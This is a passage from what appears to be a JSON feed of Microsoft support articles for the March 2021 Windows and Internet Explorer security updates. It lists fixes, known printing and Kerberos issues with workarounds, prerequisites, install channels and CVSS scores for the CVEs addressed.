update\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5000800](<https://support.microsoft.com/help/5000800>)).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000851>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000851](<https://download.microsoft.com/download/1/d/3/1d339bad-54f6-42de-a6ff-54d21c6fbdf3/5000851.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000851 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2020-17049"], "modified": "2021-03-09T08:00:00", "id": "KB5000851", "href": "https://support.microsoft.com/en-us/help/5000851", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:46:06", "description": "None\n**Important: **Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important: **WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, and Windows Hybrid Cloud Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001642. \n \n## How to get this update\n\n### Before installing this update\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n\n### Prerequisite\n\nYou must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5000800](<https://support.microsoft.com/help/5000800>)).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000856>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000856](<https://download.microsoft.com/download/5/d/4/5d4ab820-dbb3-46ab-bc55-096898eee7c6/5000856.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000856 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2020-17049"], "modified": "2021-03-09T08:00:00", "id": "KB5000856", "href": "https://support.microsoft.com/en-us/help/5000856", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:07:31", "description": "None\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1817) released March 9, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows Fundamentals, Windows Management, Windows Apps, Windows User Account Control (UAC), Windows Core Networking, Windows Hybrid Cloud Networking, the Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001568. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001638. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5000859) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000822>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000822](<https://download.microsoft.com/download/f/2/f/f2fc2870-838b-4900-aaa6-4e1168d79b43/5000822.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000822 (OS Build 17763.1817)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000822", "href": "https://support.microsoft.com/en-us/help/5000822", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-31T15:45:51", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1803 update history home page.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, the Windows Kernel, the Microsoft Graphics Component, Windows Graphics, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001565. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001634. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4580398) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000809>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000809](<https://download.microsoft.com/download/9/0/d/90d4abf0-4129-404c-be46-5a1798eab386/5000809.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000809 (OS Build 17134.2087)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000809", "href": "https://support.microsoft.com/en-us/help/5000809", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T14:07:13", "description": "None\nThis article applies to the following:\n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n**Important**\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The March 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets. \n--- \n \n## Summary\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n**Important**\n\n * The fixes that are included in this update are also included in the March 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from March 2021 (or a later month) is already installed. This is because those updates contain all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the March 2021 Security Only Quality Update, and the March 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>). \n--- \n \n## Known issues in this security update\n\nWe are currently not aware of any issues in this update.\n\n## How to get and install this update\n\n### Before installing this update\n\nTo install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the December 8, 2020 SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.\n\n### Install this update\n\nTo install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update for the following versions:\n\n * Internet Explorer 11 for Windows Server 2012 and Windows Embedded 8 Standard\nFor all other versions, see the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=5000800>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Update \n \n## File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n## \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 